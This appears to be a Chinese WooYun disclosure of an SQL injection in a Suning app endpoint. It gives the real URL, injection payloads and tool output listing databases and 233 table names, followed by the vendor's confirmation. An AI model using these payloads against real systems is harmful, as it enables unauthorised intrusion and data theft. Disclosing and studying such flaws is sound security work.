苏宁易购某APP存在SQL注射漏洞之一（root权限）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-060269

漏洞标题：苏宁易购某APP存在SQL注射漏洞之一（root权限）

漏洞作者：魇

提交时间：2014-05-11 13:21

修复时间：2014-06-25 13:22

公开时间：2014-06-25 13:22

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-05-11：细节已通知厂商并且等待厂商处理中
2014-05-12：厂商已经确认，细节仅向厂商公开
2014-05-22：细节向核心白帽子及相关领域专家公开
2014-06-01：细节向普通白帽子公开
2014-06-11：细节向实习白帽子公开
2014-06-25：细节向公众公开

简要描述：

sql注入

详细说明：

我从苏宁易购官方客户端下载了“苏宁应用商店”这款APP..
进行了一番检测,获取到该链接:

http://appjson.suning.com/advertise.php?page=1&limit=2&sys=android&class=102
其中class参数存在注入..

---
Place: GET
Parameter: class
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=1&limit=2&sys=android&class=102 AND 5199=5199
    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: page=1&limit=2&sys=android&class=102 UNION ALL SELECT NULL,CONCAT(0
x7166637271,0x7a62704f57775474664d,0x71736a6771),NULL,NULL,NULL,NULL,NULL,NULL,N
ULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: page=1&limit=2&sys=android&class=102 AND SLEEP(5)
---
[01:38:32] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.6
back-end DBMS: MySQL 5.0.11
[01:38:32] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou
tput\appjson.suning.com'
[*] shutting down at 01:38:32

---
[01:39:35] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.6
back-end DBMS: MySQL 5.0.11
[01:39:35] [INFO] fetching database users privileges
database management system users privileges:
[*] 'root'@'192.168.123.%' [1]:
    privilege: USAGE
[01:39:36] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou
tput\appjson.suning.com'
[*] shutting down at 01:39:36

available databases [6]:

[*] information_schema
[*] suning
[*] suning_app_inner
[*] suning_ios
[*] suning_win
[*] test

Database: suning
[233 tables]
+--------------------------+
| Permission               |
| action                   |
| group                    |
| temporary                |
| activity                 |
| ad_indexfocus_img        |
| ad_indexsoft             |
| admin_group              |
| admin_module             |
| admin_promotion          |
| admin_user               |
| admin_user_new           |
| app_client               |
| app_count_app_day        |
| app_count_app_hour       |
| app_count_detail         |
| app_count_device_day     |
| app_count_mobile_day     |
| app_count_user_day       |
| app_device               |
| app_imei                 |
| app_push_apps            |
| app_push_log             |
| app_software             |
| app_sys                  |
| app_sys_cmd              |
| app_temp                 |
| authorize                |
| brand_ext_inner_map      |
| brand_external           |
| brand_mobile_ext         |
| brand_model_map          |
| bug_word                 |
| category                 |
| category_anzhi           |
| category_icon            |
| cloud_bootscreen         |
| cloud_qrcode_statistics  |
| cloud_res                |
| ctrl                     |
| ctrl_copy                |
| ctrltype                 |
| ctrltype_copy            |
| department               |
| developer                |
| developer_appeal         |
| developer_msg            |
| device_info              |
| device_statistics        |
| district_day             |
| district_hour            |
| district_month           |
| district_tol             |
| district_week            |
| down_detail              |
| download                 |
| download_all             |
| download_day             |
| download_hour            |
| download_month           |
| download_tol             |
| download_week            |
| ego_ad_indexfocus_img    |
| ego_ad_indexsoft         |
| favority                 |
| feedback                 |
| feedback_detail          |
| friend_links             |
| game_ad_indexfocus_img   |
| game_ad_indexsoft        |
| game_download_all        |
| game_download_day        |
| game_download_hour       |
| game_download_month      |
| game_download_tol        |
| game_guess               |
| game_soft_ranking        |
| game_topic               |
| game_topic_info          |
| guess                    |
| h5_category              |
| h5_download_day          |
| h5_download_hour         |
| h5_download_month        |
| h5_download_tol          |
| h5_maintain_soft         |
| h5_soft_tag              |
| h5_software              |
| h5_tag                   |
| http_log                 |
| imei_day                 |
| imei_hour                |
| imei_month               |
| imei_tol                 |
| install_day              |
| install_hour             |
| install_month            |
| install_tol              |
| install_week             |
| ip_visit                 |
| keyword                  |
| list_column              |
| log                      |
| logo_icon                |
| manager                  |
| market                   |
| market_ad                |
| market_cate              |
| market_channel           |
| market_channel_day       |
| market_imei_channel      |
| mobile_brand             |
| model_drive              |
| model_feedback           |
| msg                      |
| msg_forbid               |
| news                     |
| news_app_map             |
| news_class               |
| news_comment             |
| order_soft               |
| os_day                   |
| os_hour                  |
| os_month                 |
| os_tol                   |
| os_week                  |
| outer_category           |
| page_ad_indexfocus_img   |
| people_need              |
| people_recommend         |
| privilege                |
| push_id                  |
| push_software            |
| qrcode_channel           |
| qrcode_channel_bak       |
| qrcode_channel_url       |
| qrcode_channel_url_bak   |
| quick_entry              |
| ratio_day                |
| ratio_hour               |
| ratio_month              |
| ratio_tol                |
| ratio_week               |
| recommend                |
| report                   |
| role_user                |
| score                    |
| search_day               |
| search_keywords          |
| search_month             |
| search_soft              |
| search_soft_bak20140417  |
| search_tol               |
| search_week              |
| sms_statistics           |
| sn_software              |
| soft_guess               |
| soft_ranking             |
| soft_tag                 |
| soft_ver_log             |
| software                 |
| software_bak20131017     |
| software_copy            |
| software_log             |
| software_log_copy        |
| software_permission      |
| software_pool            |
| software_safe            |
| spread_money             |
| spread_operation         |
| spread_promotion_goods   |
| spread_promotion_setting |
| spread_reward            |
| spread_soft_count_day    |
| spread_software          |
| spread_supplier          |
| suit_feedback            |
| suit_statistics          |
| suit_statistics_day      |
| suit_statistics_hour     |
| suit_statistics_month    |
| suit_version             |
| suning_district          |
| suning_store             |
| suning_user              |
| supplier                 |
| sys_ad                   |
| sys_ad_stat              |
| sys_ad_stat_day          |
| sys_brand                |
| sys_brand_info           |
| sys_cate                 |
| sys_soft                 |
| sys_topic                |
| sys_topic_info           |
| sys_word                 |
| tag                      |
| tag_app_map              |
| term_district_day        |
| term_district_hour       |
| term_district_month      |
| term_district_tol        |
| term_imei                |
| term_imei_day            |
| term_imei_hour           |
| term_imei_month          |
| term_imei_tol            |
| term_install             |
| term_install_old         |
| term_install_testlog     |
| term_model_day           |
| term_model_hour          |
| term_model_month         |
| term_model_tol           |
| term_os_day              |
| term_os_hour             |
| term_os_month            |
| term_os_tol              |
| term_ratio_day           |
| term_ratio_hour          |
| term_ratio_month         |
| term_ratio_tol           |
| term_stat_by_imei_day    |
| term_stat_by_pack        |
| term_stat_by_pack_model  |
| topic                    |
| topic_info               |
| updatesoft_log           |
| verify_reason            |
| web                      |
| web_ad                   |
| web_notice               |
| web_tag                  |
+--------------------------+

漏洞证明：

修复方案：

你们更专业，话说不会还给10RANK把？求15-20RANK..

版权声明：转载请注明来源魇@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2014-05-12 10:16

厂商回复：

感谢您对苏宁易购的关注，正在安排人员对此漏洞进行修复。

漏洞评价：

2014-05-18 12:25 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号，不装逼了，再见孩子们。by Mosua...)

大神

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-060269

漏洞标题：苏宁易购某APP存在SQL注射漏洞之一（root权限）

相关厂商：江苏苏宁易购电子商务有限公司

漏洞作者：魇

提交时间：2014-05-11 13:21

修复时间：2014-06-25 13:22

公开时间：2014-06-25 13:22

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源魇@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-060269

漏洞标题：苏宁易购某APP存在SQL注射漏洞之一（root权限）

相关厂商：江苏苏宁易购电子商务有限公司

漏洞作者： 魇

提交时间：2014-05-11 13:21

修复时间：2014-06-25 13:22

公开时间：2014-06-25 13:22

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-060269"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 魇@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：魇

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源魇@乌云